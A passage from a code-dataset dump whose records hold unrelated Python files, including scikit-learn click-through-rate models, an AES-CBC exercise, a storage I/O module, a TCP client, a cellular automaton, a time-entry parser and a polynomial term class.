  # path_nodel = './m1/hayinm1_nodel_tag.xlsx'\n    path_nodel_tag ='./m2/m2_tag_biaozhu_nodel.xlsx' \n\n    origin = fit(path, path_nodel_tag) \n    eval(origin, if_csv=True, save_p='./m2/eval_nodel_result.csv')\n    # mapping(path_nodel, path2)\n","sub_path":"pandas_learn/哈银_数据读取_案例/hayin_xiaofei_data_eval/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"54845258","text":"# -*- 
coding: utf-8 -*-\nimport sys\nimport csv\nimport time\nimport pickle\nimport numpy as np\nimport warnings\n\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.externals import joblib\n\nfrom output import printGreen, printYellow, printRed\n\nwarnings.filterwarnings(\"ignore\") # Some depreciate warnings regarding scikit in online learning\n\n#\n# PROCESS DATA\n#\ndef process_data(samples, offset=0):\n # Build dataframes\n X_dict = []\n y = []\n\n # Open file\n with open('../data/raw/train', 'r') as csvfile:\n # Create reader\n reader = csv.DictReader(csvfile)\n for i in range(offset):\n next(reader)\n i = 0\n for row in reader:\n i += 1\n\n # Append Label to y\n y.append(int(row['click']))\n # Remove features\n del row['click'], row['id'], row['hour'], row['device_id'], row['device_ip']\n \n # Append input to X\n X_dict.append(row)\n if i >= samples:\n break\n \n return X_dict, y\n\n#\n# DECISION TREE ~20 min to train\n#\ndef decision_tree(load_model=False):\n start = time.time()\n if load_model == False:\n printYellow(\"* Decision tree model training started...\")\n\n # Create training set of 100,000 samples\n n_max = 100000\n X_dict_train, y_train = process_data(100000)\n\n # Transform training dictionary into one-hot encoded vectors\n dict_one_hot_encoder = DictVectorizer(sparse=False)\n X_train = dict_one_hot_encoder.fit_transform(X_dict_train)\n # print(len(X_train[0]))\n\n # Creating test set and turn into one-hot encoded vectors\n X_dict_test, y_test = process_data(100000, 100000)\n X_test = dict_one_hot_encoder.transform(X_dict_test)\n # print(len(X_test[0]))\n \n # Load Model\n if load_model == True:\n printGreen('✔ Loading model from previous training...')\n d_tree_file = open('../models/decision_tree_model.sav', 'rb')\n decision_tree_final = pickle.load(d_tree_file)\n # d_tree_file.close()\n\n # Evaluate model on test set\n prob = decision_tree_final.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, prob)\n printGreen('✔ ROC AUC score on test set: {0:.3f}'.format(score))\n d_tree_file.close()\n return 0\n\n # Train decision tree classifier\n params = {'max_depth': [3, 10, None]}\n decision_tree_model = DecisionTreeClassifier(criterion='gini',\n min_samples_split=30)\n grid_search = GridSearchCV(decision_tree_model, params, n_jobs=-1, cv=3, scoring='roc_auc')\n # print(\"Training started..\")\n grid_search.fit(X_train, y_train)\n printGreen('✔ Decision tree model training complete...\"\\t\\t{0:.1f}s'.format(time.time() - start))\n\n # Use model with best parameter as final model\n decision_tree_final = grid_search.best_estimator_\n\n # Evaluate and run model on training data\n prob = decision_tree_final.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, prob)\n printGreen('✔ ROC AUC score on test set: {0:.3f}'.format(score))\n\n # Save Model\n decision_tree_model_file = open('../models/decision_tree_model.sav', \"wb\")\n pickle.dump(decision_tree_final, decision_tree_model_file)\n decision_tree_model_file.close()\n printGreen('✔ Decision tree model saved...')\n\n return 0\n\n#\n# RANDOM FOREST ~ 20 min to train\n#\ndef random_forest(load_model=False):\n start = time.time()\n if load_model == False:\n printYellow(\"* Random forest model training started...\")\n\n # Create training set of 100,000 samples\n 
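# (added note) rows 0-99,999 are read for training; process_data(100000, 100000) below\n    # skips the first 100,000 rows, so the test split does not overlap the training split\n    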
n_max = 100000\n X_dict_train, y_train = process_data(100000)\n\n # Transform training dictionary into one-hot encoded vectors\n dict_one_hot_encoder = DictVectorizer(sparse=False)\n X_train = dict_one_hot_encoder.fit_transform(X_dict_train)\n\n # Creating test set and turn into one-hot encoded vectors\n X_dict_test, y_test = process_data(100000, 100000)\n X_test = dict_one_hot_encoder.transform(X_dict_test)\n\n # Load model instead of training again..\n if load_model == True:\n printGreen('✔ Loading model from previous training...')\n r_forest_file = open('../models/random_forest_model.sav', 'rb')\n random_forest_final = pickle.load(r_forest_file)\n probs = random_forest_final.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, probs)\n printGreen('✔ ROC AUC score on test set: {0:.3f}'.format(score))\n r_forest_file.close()\n return 0\n \n # Train random forest classifier\n params = {'max_depth': [3, 10, None]}\n random_forest_model = RandomForestClassifier(n_estimators=100, criterion='gini', min_samples_split=30,\n n_jobs=-1)\n grid_search = GridSearchCV(random_forest_model, params, n_jobs=-1, cv=3, scoring='roc_auc')\n grid_search.fit(X_train, y_train)\n printGreen('✔ Random forest model training complete...\"\\t\\t{0:.1f}s'.format(time.time() - start))\n\n # Use best paramter for final model\n random_forest_final = grid_search.best_estimator_\n\n # Evaluate model\n probs = random_forest_final.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, probs)\n printGreen('✔ ROC AUC score on test set: {0:.3f}'.format(score))\n\n # Save Model\n random_forest_file = open('../models/random_forest_model.sav', \"wb\")\n pickle.dump(random_forest_final, random_forest_file)\n random_forest_file.close()\n printGreen('✔ Random forest model saved...')\n return 0\n\n#\n# SGD-BASED LOGISTIC REGRESSION ~20 sec. 
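(one in-memory fit, 100k rows by default) 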
to train\n#\ndef logistic_regression(sample_size=100000, load_model=False):\n start = time.time()\n if load_model == False:\n printYellow(\"* Logistic regression model training started...\")\n\n # Create Training Set\n n = sample_size\n X_dict_train, y_train = process_data(n)\n dict_one_hot_encoder = DictVectorizer(sparse=False)\n X_train = dict_one_hot_encoder.fit_transform(X_dict_train)\n\n # Create Test Set\n X_dict_test, y_test = process_data(n, n)\n X_test = dict_one_hot_encoder.transform(X_dict_test)\n\n X_train_n = X_train\n y_train_n = np.array(y_train)\n\n # Load model instead of training again\n if load_model == True:\n printGreen('✔ Loading model from previous training...')\n l_reg_file = open('../models/logistic_regression_model.sav', 'rb')\n sgd_log_reg_model = pickle.load(l_reg_file)\n predictions = sgd_log_reg_model.predict_proba(X_test)[:, 1]\n score = roc_auc_score(y_test, predictions)\n printGreen(\"✔ ROC AUC score on test set: {0:.3f}\".format(score))\n return 0\n\n # Create SGD Logistic Regression Classifier\n sgd_log_reg_model = SGDClassifier(loss='log', penalty=None, fit_intercept=True,\n n_iter=5, learning_rate='constant', eta0=0.01)\n\n # Train Classifier\n sgd_log_reg_model.fit(X_train_n, y_train_n)\n printGreen('✔ Logistic regression model training complete...\"\\t\\t{0:.1f}s'.format(time.time() - start))\n\n # Run model on test set\n predictions = sgd_log_reg_model.predict_proba(X_test)[:, 1]\n\n # Evaluate model\n score = roc_auc_score(y_test, predictions)\n printGreen(\"✔ ROC AUC score on test set: {0:.3f}\".format(score))\n\n # Save model\n l_reg_file = open('../models/logistic_regression_model.sav', \"wb\")\n pickle.dump(sgd_log_reg_model, l_reg_file)\n l_reg_file.close()\n printGreen('✔ Logistic regression model saved...')\n\n#\n# LOGISTIC REGRESSION USING ONLINE LEARNING ~6 min. 
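(20 partial_fit chunks of 100k rows) 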
to train\n#\ndef logistic_regression_ol(load_model=False):\n start = time.time()\n if load_model == False:\n printYellow(\"* Logistic regression (using online learning) model training started...\")\n\n # Build Classifier\n sgd_log_reg_model = SGDClassifier(loss='log', penalty=None, fit_intercept=True, n_iter=1, learning_rate='constant', eta0=0.01)\n \n # Training sets\n X_dict_train, y_train = process_data(100000)\n dict_one_hot_encoder = DictVectorizer(sparse=False)\n X_train = dict_one_hot_encoder.fit_transform(X_dict_train)\n \n X_train_100k = X_train\n y_train_100k = np.array(y_train)\n\n # Test sets\n X_dict_test, y_test_next10k = process_data(10000, 100000)\n X_test_next10k = dict_one_hot_encoder.transform(X_dict_test)\n\n \n if load_model == True:\n printGreen('✔ Loading model from previous training...')\n l_reg_file = open('../models/logistic_regression_model_ol.sav', 'rb')\n sgd_log_reg_model = pickle.load(l_reg_file)\n X_dict_test, y_test_next = process_data(10000, (20 + 1) * 200000)\n X_test_next = dict_one_hot_encoder.transform(X_dict_test)\n predict = sgd_log_reg_model.predict_proba(X_test_next)[:, 1]\n score = roc_auc_score(y_test_next, predict)\n printGreen(\"✔ ROC AUC score on test set: {0:.3f}\".format(score))\n return 0\n\n # Train and partially fit on 1 million samples\n for i in range(20):\n X_dict_train, y_train_every = process_data(100000, i * 100000)\n X_train_every = dict_one_hot_encoder.transform(X_dict_train)\n sgd_log_reg_model.partial_fit(X_train_every, y_train_every, classes=[0, 1])\n \n printGreen('✔ Logistic regression (using online learning) model training complete...\"\\t\\t{0:.1f}s'.format(time.time() - start))\n \n # Get test set\n X_dict_test, y_test_next = process_data(10000, (i + 1) * 200000)\n X_test_next = dict_one_hot_encoder.transform(X_dict_test)\n \n # Evaluate\n predict = sgd_log_reg_model.predict_proba(X_test_next)[:, 1]\n score = roc_auc_score(y_test_next, predict)\n printGreen(\"✔ ROC AUC score on test set: {0:.3f}\".format(score))\n\n # Save Model\n l_reg_file = open('../models/logistic_regression_model_ol.sav', \"wb\")\n pickle.dump(sgd_log_reg_model, l_reg_file)\n l_reg_file.close()\n printGreen('✔ Logistic regression (using online learning) model saved...')\n return 0\n\n#\n# MAIN\n#\ndef main():\n # Initial Message\n printGreen(\"Click-through rate models training started...\\n\")\n\n # Decision Tree\n printGreen('Decision Tree')\n decision_tree(load_model=True)\n print('\\n')\n\n # Random Forest\n printGreen('Random Forest')\n random_forest(load_model=False)\n print('\\n')\n\n # Logistic Regression\n printGreen('SGD Based Logistic Regression')\n logistic_regression(load_model=True)\n print('\\n')\n\n # OL Logistic Regression\n printGreen('Logistic Regressions using Online Learning')\n logistic_regression_ol(load_model=True)\n print('\\n')\n\n printGreen(\"✔ Done\")\n\nif __name__ == '__main__':\n main()","sub_path":"src/ctr_prediction.py","file_name":"ctr_prediction.py","file_ext":"py","file_size_in_byte":10922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313025375","text":"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom functools import reduce\nimport base64\n\n\nbackend = default_backend()\n\n\ndef xor(bytestr1, bytestr2):\n return [bytestr1[i] ^ bytestr2[i] for i in range(len(bytestr1))]\n\n\ndef padPKCS7(text, keyL):\n pad = keyL - (len(text) % keyL)\n return text + bytes([pad] * 
pad)\n\n\ndef splitTXT(text, keySize):\n k = keySize\n return [text[i:i+k] for i in range(0, len(text), k)]\n\n\ndef aesECBEncrypt(key, plain):\n cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=backend)\n encryptor = cipher.encryptor()\n return encryptor.update(plain) + encryptor.finalize()\n\n\ndef aesECBDecrypt(key, ciphertxt):\n cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=backend)\n decryptor = cipher.decryptor()\n return decryptor.update(ciphertxt) + decryptor.finalize()\n\n\ndef aesCBCEncrypt(key, plain, IV):\n blocks = splitTXT(plain, 16)\n blocks[-1] = padPKCS7(blocks[-1], 16)\n x0 = xor(blocks[0], IV)\n cipherTxt = [aesECBEncrypt(key, x0)]\n for i in range(1, len(blocks)):\n x = xor(cipherTxt[i-1], blocks[i])\n cipherTxt.append(aesECBEncrypt(key, x))\n return b''.join(cipherTxt)\n\n\ndef aesCBCDecrypt(key, ciphertext, IV):\n blocks = splitTXT(ciphertext, 16)\n x0 = aesECBDecrypt(key, blocks[0])\n plainList = [xor(x0, IV)]\n for i in range(1, len(blocks)):\n plainList.append(xor(blocks[i-1], aesECBDecrypt(key, blocks[i])))\n plainList = reduce(lambda x, y: x+y, plainList)\n return \"\".join([chr(j) for j in plainList])\n\n\nif __name__ == \"__main__\":\n\n key = b'YELLOW SUBMARINE'\n IV = bytes(16)\n\n with open('cipherfile5', 'r') as f:\n c = f.read()\n x = base64.b64decode(c)\n\n print(aesCBCDecrypt(key, x, IV))\n","sub_path":"ch10.py","file_name":"ch10.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"22543258","text":"import io\nfrom functools import partial\nfrom typing import List\nfrom typing import Optional, Union\n\nfrom ..base import (adapter,\n split_protocol_path,\n without_protocol,\n join_protocol_path,\n handle_error)\nfrom ... 
import security\n\n_ADAPTERS_AVAILABLE = {\n 'file': ('ink.core.forge.joins.core.io.storage.adapters.file_system', 'FileSystemStorageAdapter'),\n 'gs': ('ink.core.forge.joins.core.io.storage.adapters.google_cloud', 'GoogleCloudStorageAdapter')\n}\n_ADAPTERS = {}\n\nadapter = partial(adapter,\n adapters=_ADAPTERS,\n adapters_available=_ADAPTERS_AVAILABLE)\n\n\ndef open(filename: str, mode: str = 'rb', encoding='utf-8', on_error: str = 'raise'):\n \"\"\"Open files from multiple sources.\n\n # TODO: Implement cryptography for sources.\n \"\"\"\n if not 3 >= len(mode) >= 1 or len(mode) > 1 and mode[1] not in {'+', 'b'}:\n return handle_error('invalid mode: ' + mode, on_error, ValueError)\n\n both = len(mode) > 1 and mode[1] == '+'\n binary = mode[-1] == 'b'\n\n protocol, filename = split_protocol_path(filename)\n try:\n ap = adapter(protocol)\n mode = '+' if both else mode[0]\n\n if mode[0] == '+':\n stream = io.BufferedRWPair(ap.reader(filename), ap.writer(filename))\n elif mode[0] == 'r':\n stream = ap.reader(filename)\n elif mode[0] in ('w', 'a'):\n stream = ap.writer(filename, append=mode[0] == 'a')\n else:\n return handle_error('invalid mode: ' + mode, on_error, ValueError)\n\n if not binary:\n stream = io.TextIOWrapper(stream, encoding)\n\n return stream\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef read(filename: str, encoding='utf-8', crypto: security.Crypto = None,\n on_error: str = 'raise') -> str:\n \"\"\"Reads a file from storage.\n\n Parameters\n ----------\n filename : str\n crypto : security.Crypto\n Cryptography agent to be used for decryption.\n encoding : str, optional\n Encoding to read the file into (default: ``'utf-8'``).\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Returns\n -------\n str\n\n Raises\n ------\n FileNotFoundError\n If file does not exist in storage.\n\n \"\"\"\n protocol, filename = split_protocol_path(filename)\n try:\n data = adapter(protocol).read(filename)\n if crypto:\n data = crypto.decrypt(data)\n return data.decode(encoding)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef write(filename: str, data: Union[bytes, str], encoding='utf-8', crypto: security.Crypto = None):\n \"\"\"Writes data to a file on storage.\n\n Parameters\n ----------\n filename : str\n data : bytes or str\n encoding : str, optional\n Encoding to use when ``data`` is of type ``str`` (default: ``'utf-8'``).\n crypto : security.Crypto\n Cryptography agent to be used for encryption.\n\n \"\"\"\n protocol, filename = split_protocol_path(filename)\n if isinstance(data, str):\n data = data.encode(encoding)\n if crypto:\n data = crypto.encrypt(data)\n adapter(protocol).write(filename, data)\n\n\ndef delete(filename: str, on_error: str = 'raise'):\n \"\"\"Deletes a file from storage.\n\n Parameters\n ----------\n filename : str\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Raises\n ------\n FileNotFoundError\n If the specified directory does not exist.\n\n \"\"\"\n protocol, filename = split_protocol_path(filename)\n try:\n adapter(protocol).delete(filename)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef copy(source: str, target: str, on_error: str = 'raise', move: bool = False):\n \"\"\"Copies a file internally or between storages.\n\n Parameters\n ----------\n source, target : str\n Source and target file names.\n on_error : {'raise', 'log'}, 
optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n move : bool, optional\n Whether to delete the file after copying (default: False).\n\n Raises\n ------\n FileNotFoundError\n If source file does not exist.\n\n \"\"\"\n source_protocol, source_filename = split_protocol_path(source)\n target_protocol, target_filename = split_protocol_path(target)\n try:\n adapter(source_protocol).copy(source_filename, target_filename,\n other=adapter(target_protocol), move=move)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef move(source: str, target: str, on_error: str = 'raise'):\n \"\"\"Moves a file internally or between storages.\n\n Parameters\n ----------\n source, target : str\n Source and target file names.\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Raises\n ------\n FileNotFoundError\n If source file does not exist.\n\n \"\"\"\n copy(source, target, on_error, move=True)\n\n\ndef listdir(dirname: str, matching: Optional[str] = None, on_error: str = 'raise') -> List[str]:\n \"\"\"Lists contents of a directory on storage.\n\n Parameters\n ----------\n dirname : str\n Name of the directory.\n matching : str\n Regular expression to filter files with.\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Returns\n -------\n list of str\n A list with the names of the files in the directory.\n\n Raises\n ------\n FileNotFoundError\n If the specified directory does not exist.\n\n \"\"\"\n protocol, dirname = split_protocol_path(dirname)\n try:\n return adapter(protocol).listdir(dirname, matching)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef isdir(path: str, on_error: str = 'raise') -> List[str]:\n \"\"\"Determines whether a given path refers to an existing directory.\n\n Parameters\n ----------\n path : str\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Returns\n -------\n bool\n\n \"\"\"\n protocol, path = split_protocol_path(path)\n try:\n return adapter(protocol).isdir(path)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef isfile(path: str, on_error: str = 'raise') -> List[str]:\n \"\"\"Determines whether a given path refers to an existing file.\n\n Parameters\n ----------\n path : str\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Returns\n -------\n bool\n\n \"\"\"\n protocol, path = split_protocol_path(path)\n try:\n return adapter(protocol).isfile(path)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef exists(filename: str) -> bool:\n \"\"\"Checks whether a file exists in storage\n\n Parameters\n ----------\n filename : str\n\n Returns\n -------\n bool\n\n \"\"\"\n protocol, filename = split_protocol_path(filename)\n return adapter(protocol).exists(filename)\n\n\n__all__ = [\n 'split_protocol_path', 'without_protocol', 'join_protocol_path',\n 'adapter',\n 'open', 'read', 'write', 'delete', 'copy', 'move',\n 'listdir', 'isdir', 'isfile', 'exists',\n]\n","sub_path":"ink/core/forge/joins/core/io/storage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"447334862","text":"\ndef count():\n def f(j):\n def g():\n print()\n return j*j\n 
print(str(g) + \"##\"*20)\n        print(g)\n        return g\n    fs = []\n    for i in range(1, 4):\n        fs.append(f(i)) # f(i) is called immediately, so the current value of i is passed into f()\n        # print(str(f(i)) + \"**\"*20)\n    print(fs)\n\n    return fs\n\n\nf1, f2, f3 = count()\nprint(f1())\nprint(f2())\n\n#\n# a = lambda x,y:[i*i for i in range(int(x), int(y))]\n# print(a(5, 7))\n\n\ndef count():\n    fs = []\n\n    for i in range(1, 4):\n        def f():\n            print(12)\n            return i*i\n        # print(str(f) + \"***\")\n        fs.append(f)\n        print(123)\n        print(f)\n    print(fs)\n    return fs\n\nf1, f2, f3 = count()\nprint(f1())\n","sub_path":"xitike(习题课)/xitike(第4章python高级语法)/闭包.py","file_name":"闭包.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"166077952","text":"#!/usr/bin/env python\nfrom socket import *\nimport sys\n\nHOST = '10.107.33.76'\nPORT = 21567\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\ntcpCliSock = socket(AF_INET, SOCK_STREAM)\ntcpCliSock.connect(ADDR)\n\nwhile True:\n    data = input('> ')\n    if not data:\n        break\n    tcpCliSock.send(bytes(data.encode('utf-8')))\n    data = tcpCliSock.recv(BUFSIZ)\n    if not data:\n        break\n    #print(data.encode('utf-8'))\n    print(data.decode('utf-8'))\n    #print(data)\ntcpCliSock.close()\n","sub_path":"77.py","file_name":"77.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"349199868","text":"import random\nimport numpy as np  # added: np.zeros and other np.* calls below, but numpy was never imported\nimport matplotlib.pyplot as plt\nimport cv2\n\n# Number of Colors in color palette\nN = 14\n\ndef map2img(canvas, colors):\n    image = np.zeros((canvas.shape[0],canvas.shape[1],3))\n    for i in range(0,canvas.shape[0]):\n        for j in range(0,canvas.shape[1]):\n            image[i,j,:] = colors[int(canvas[i,j]),:]\n    \n    return image.astype(int)\n\ndef setup(size=(256,256)):\n    colors = np.zeros((N,3))\n    for i in range(0,N):\n        colors[i,:] = [random.randint(0,255),random.randint(0,255),random.randint(0,255)]\n    \n    canvas = np.zeros(size)\n    for i in range(0,size[0]):\n        for j in range(0,size[1]):\n            canvas[i,j] = int(random.randint(0,N-1))\n\n    return canvas, colors\n\n\n# Cyclic Cellular Automata with threshold as 1 and Neumann Neighborhood\ndef automate_cyclic(canvas, N):\n    new_can = np.zeros(canvas.shape)\n    height, width = canvas.shape\n    for i in range(0,height):\n        for j in range(0,width):\n            new_can[i,j] = canvas[i,j]\n            nextValue = int(canvas[i,j]+1)%N\n            if(nextValue == canvas[i, (j+1)%width] or nextValue == canvas[(i+1)%height, j] or nextValue == canvas[(i-1+height)%height, j] or nextValue == canvas[i, (j-1+width)%width]):\n                new_can[i,j] = nextValue\n    return new_can\n\ncanvas, colors = setup()\n\nfor i in range(0,1000):\n    canvas = automate_cyclic(canvas,N)\n    img = map2img(canvas, colors)\n    if (i%50==0):\n        plt.figure(figsize = (5,5))\n        plt.imshow(img.astype(int))\n        plt.show(block=False)\n        plt.pause(0.1)\n        plt.close() \n\n\n\n","sub_path":"Two_Dimensional_CA/Code/Cyclic CA/Cyclic_cellular_Automata_basic.py","file_name":"Cyclic_cellular_Automata_basic.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"622556340","text":"import re\nimport datetime\n\nclass Entry(object):\n\n    def is_today(self):\n        if self.date==datetime.datetime.today().date():\n            return True\n        else:\n            return False\n\n    def days_old(self):\n        if not self.date: \n            return 999999\n        else:\n            delta = datetime.date.today() - self.date\n            return delta.days\n\n\n    def is_date(self,input_string):\n        match = re.search(r'\d{2}/\d{2}/\d{2}', 
input_string)\n        if match:\n            testdate = datetime.datetime.strptime(match.group(), '%d/%m/%y').date()\n            if testdate==self.date:\n                return True\n            else:\n                return False\n        else:\n            raise ValueError(\"Date string is badly formed\")  # was ValueException, which is not a builtin\n        return False #should never be here\n\n\n    def __init__(self, input_string):\n        import types\n        if isinstance(input_string, str):\n            pass\n        else: \n            raise ValueError(\"Input to constructor wasn't a string\") \n        try:\n            self.input_string=input_string\n            match = re.search(r'\d{2}/\d{2}/\d{2}', input_string)\n            if match:\n                self.date = datetime.datetime.strptime(match.group(), '%d/%m/%y').date()\n            else:\n                self.date = None\n            self.start=None\n            self.end=None\n            match = re.search(r'(?P<start>\d{2}:\d{2}) to (?P<end>\d{2}:\d{2})', input_string)  # named groups restored; they were lost in extraction\n            if match:\n                self.start = match.group('start')\n                self.end = match.group('end')\n            else:\n                match = re.search(r'(?P<start>\d{2}:\d{2})', input_string)\n                if match:\n                    self.start = match.group('start')\n                    self.end = self.start\n                else:\n                    raise ValueError(\"No Start value found on: {}\".format(input_string))\n            match = re.search(r',\s*(?P<title>.*)', input_string)\n            self.title=None\n            if match:\n                self.title =match.group(\"title\").strip()\n            if self.title==None:\n                print(\"Warning: NO title for {}\".format(self))\n                self.title=\"\"\n\n        except AttributeError as err:\n            print(\"Exception! On this line:\")\n            print(input_string)\n            raise err\n\n    def start_epoch(self):\n        time=self.start_datetime()\n        epoch = time.timestamp()\n        return epoch\n\n\n\n\n    def end_epoch(self):\n        time=self.end_datetime()\n        epoch = time.timestamp()\n        return epoch\n\n    def start_datetime(self):\n        from datetime import datetime\n        FMT = '%Y-%m-%d%H:%M'\n        return datetime.strptime(str(self.date) + self.start, FMT) \n    \n    def end_datetime(self):\n        if self.end==None:\n            self.end=self.start\n        from datetime import datetime\n        FMT = '%Y-%m-%d%H:%M'\n        return datetime.strptime(str(self.date) + self.end, FMT) \n\n    def get_duration(self):\n        #from https://stackoverflow.com/a/3096984/170243\n        from datetime import datetime\n        FMT = '%H:%M'\n        tdelta = datetime.strptime(self.end, FMT) - datetime.strptime(self.start, FMT)\n        return tdelta.total_seconds()/60 #returns in minutes\n\n\n\n    def __str__(self):\n        return self.input_string\n\n","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"33035646","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = 'Yee_172'\n__date__ = '2017/8/28'\n\n# from copy import deepcopy\nfrom functools import reduce\nfrom decimal import Decimal\n\ndef ftoi(num):\n    \"\"\"\n    Float to int if it has no decimal\n    1.0 -> 1\n    \"\"\"\n    return int(num) if int(num) == num else num\n\n\ndef dtos(num):\n    \"\"\"\n    Digit to Simply digit\n    1.0000000000001 -> 1\n    \"\"\"\n    return ftoi(round(num, 10))\n\n\ndef stos(string):\n    \"\"\"\n    String to Simply digit\n    '1.0000000000001' -> 1\n    \"\"\"\n    return dtos(float(string))\n\n\nclass Indeterminate:\n    \"\"\"\n    A member of the Term\n    \"\"\"\n\n    def __init__(self, unknown, subscript=None, degree=1.0):\n        if not isinstance(unknown, str):\n            raise Exception('Name of Indeterminate must be string!')\n        if not isinstance(subscript, str) and subscript is not None:\n            raise Exception('Subscript must be string!')\n        if isinstance(degree, bool) or isinstance(degree, str):\n            raise Exception('Degree must be int or float!')\n\n        if degree:\n            self.unknown 
= ''\n self.subscript = None\n self.degree = 0\n\n def tolist(self):\n \"\"\"\n Return a list of its info\n \"\"\"\n return [self.unknown, self.subscript, self.degree]\n\n def __str__(self):\n \"\"\"\n Return a string means the same\n \"\"\"\n if not self.unknown:\n return '1'\n elif self.degree == 1:\n if self.subscript:\n return '%s_%s' % (self.unknown, self.subscript)\n else:\n return self.unknown\n else:\n if self.subscript:\n return '%s_%s^%s' % (self.unknown, self.subscript, str(self.degree))\n else:\n return '%s^%s' % (self.unknown, str(self.degree))\n\n def latex(self):\n \"\"\"\n Return a latex form\n \"\"\"\n if not self.unknown:\n return '1'\n elif self.degree == 1:\n if self.subscript:\n return '%s$_{%s}$' % (self.unknown, self.subscript)\n else:\n return self.unknown\n else:\n if self.subscript:\n return '%s$_{%s}^{%s}$' % (self.unknown, self.subscript, str(self.degree))\n else:\n return '%s$^{%s}$' % (self.unknown, str(self.degree))\n\n def showdetail(self, spaces=0):\n \"\"\"\n Print detailed info\n \"\"\"\n if not isinstance(spaces, int):\n raise Exception('The number of spaces must be integer!')\n\n print(' ' * spaces + 'unknown :\\t %s' % self.unknown)\n print(' ' * spaces + 'subscript:\\t %s' % self.subscript)\n print(' ' * spaces + 'degree :\\t %s' % str(self.degree))\n\n def __eq__(self, other):\n \"\"\"\n Judge if two Indeterminates are equal\n \"\"\"\n if not isinstance(other, Indeterminate):\n raise Exception('Must compare with an Indeterminate!')\n\n if self.unknown == other.unknown:\n if self.subscript == other.subscript:\n if self.degree == other.degree:\n return True\n return False\n\n # def __copy__(self):\n # \"\"\"\n # Return a copy of itself\n # \"\"\"\n # return Indeterminate(self.unknown, self.subscript, self.degree)\n\n def ismultiplicative(self, other):\n \"\"\"\n Judge if two Indeterminates can multiply\n \"\"\"\n if not isinstance(other, Indeterminate):\n raise Exception('Must compare with an Indeterminate!')\n\n if self == CONSTANT or other == CONSTANT:\n return True\n if self.unknown == other.unknown:\n if self.subscript == other.subscript:\n return True\n return False\n\n def __mul__(self, other):\n \"\"\"\n Multiply two multiplicative Indeterminates\n I1 * I2\n \"\"\"\n if not isinstance(other, Indeterminate):\n raise Exception('Indeterminate must be valid!')\n if not self.ismultiplicative(other):\n raise Exception('Multiplicative Indeterminate acquired!')\n\n if self == CONSTANT:\n return Indeterminate(other.unknown, other.subscript, other.degree)\n degree = self.degree + other.degree\n return Indeterminate(self.unknown, self.subscript, degree) if degree else CONSTANT\n\n def __truediv__(self, other):\n \"\"\"\n Divide an Indeterminate by another\n I1 / I2\n \"\"\"\n return self * Indeterminate(other.unknown, other.subscript, -other.degree)\n\n\nCONSTANT = Indeterminate('', degree=0)\n\n\nclass Term:\n \"\"\"\n A member of the Polynomial\n \"\"\"\n\n def __init__(self, *indeterminates, coefficient=1.0):\n if isinstance(coefficient, bool) or isinstance(coefficient, str):\n raise Exception('Coefficient must be valid!')\n for each in indeterminates:\n if not isinstance(each, Indeterminate):\n raise Exception('Each Indeterminate must be valid!')\n\n # Sort the indeterminates by indeterminate and subscript\n indeterminates = sorted(indeterminates, key=lambda x: x.subscript or '')\n indeterminates = sorted(indeterminates, key=lambda x: x.unknown)\n index = 0\n while 1:\n if index >= len(indeterminates) - 1:\n break\n try:\n middle = 
